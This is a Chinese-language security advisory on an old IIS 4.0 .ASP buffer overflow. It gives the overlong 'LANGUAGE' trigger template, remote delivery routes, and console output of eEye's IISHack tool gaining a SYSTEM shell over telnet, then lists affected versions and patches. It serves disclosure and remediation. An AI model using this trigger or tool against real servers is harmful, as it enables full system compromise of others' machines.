涉及程序: ASP 描述: IIS .ASP文件缓冲区溢出漏洞 详细: 在Microsoft IIS 4.0的.ASP ISAPI文件解析机制中存在一个缓冲区溢出漏洞,利用该漏洞将可以获得SYSTEM水平的访问权限。 该漏洞是一个本地漏洞,但如果攻击者可以上传.acp文件,它将被远程利用。 在对Java Script中"LANGUAGE"变量的处理中,如果提供一个超长的字符串给"LANGUAGE"变量,将导致IIS解析时inetinfo.exe产生溢出。下面是一个例子.asp文件: ... <SCRIPT LANGUAGE="[buffer]" RUNAT="Server"> </SCRIPT> .. 在[buffer中]包含2220个或者更多的字符,将导致溢出发生。这可能使攻击者获取SYSTEM级别的权限。 攻击者进行远程攻击可以通过下列方法: *对于提供虚拟主机或者asp上传的站点。攻击者只需上传一个恶意的asp文件。就可以远程获取SYSTEM权限。 *某些留言板或者BBS程序允许用户输入Java Script脚本。攻击者就可以在留言中输入包含恶意代码的Java Script语句,远程入侵系统。 *利用IIS unicode漏洞,攻击者可以远程在受影响系统上创建恶意asp文件并发动溢出攻击。 以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负 C:\we are still hiring good programmers> iishack1.5.exe IISHack Version 1.5 eEye Digital Security http://www.eEye.com Code By: Ryan Permeh & Marc Maiffret eEye Digital Security takes no responsibility for use of this code. It is for educational purposes only. Usage: IISHack1.5 [server] [server-port] [trojan-port] C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969 IISHack Version 1.5 eEye Digital Security http://www.eEye.com Code By: Ryan Permeh & Marc Maiffret eEye Digital Security takes no responsibility for use of this code. It is for educational purposes only. Attempting to find an executable directory... Trying directory [scripts] Executable directory found. [scripts] Path to executable directory is [C:\Inetpub\scripts] Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts. Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe Sending the exploit... Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt. C:\> telnet www.[yourowncompany].com 6969 Trying www.[yourowncompany].com... Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\WINNT\system32>whoami NT AUTHORITY\SYSTEM 受影响的系统: Microsoft IIS 4.0 sp6 - Microsoft Windows NT 4.0 不受影响系统: Microsoft IIS 5.0 - Microsoft Windows 2000 解决方案: 微软已经在一些hot fixes中修复了该缓冲区溢出漏洞,安装下列hot fix都可以修复此漏洞: MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities MS00-057: Patch Available for "File Permission Canonicalization" Vulnerability MS00-030: Patch Available for "Malformed Extension Data in URL" Vulnerability MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability |
|
|
|
|
文章转载地址:http://www.cnpaf.net/Class/hack/06101110492110379266.html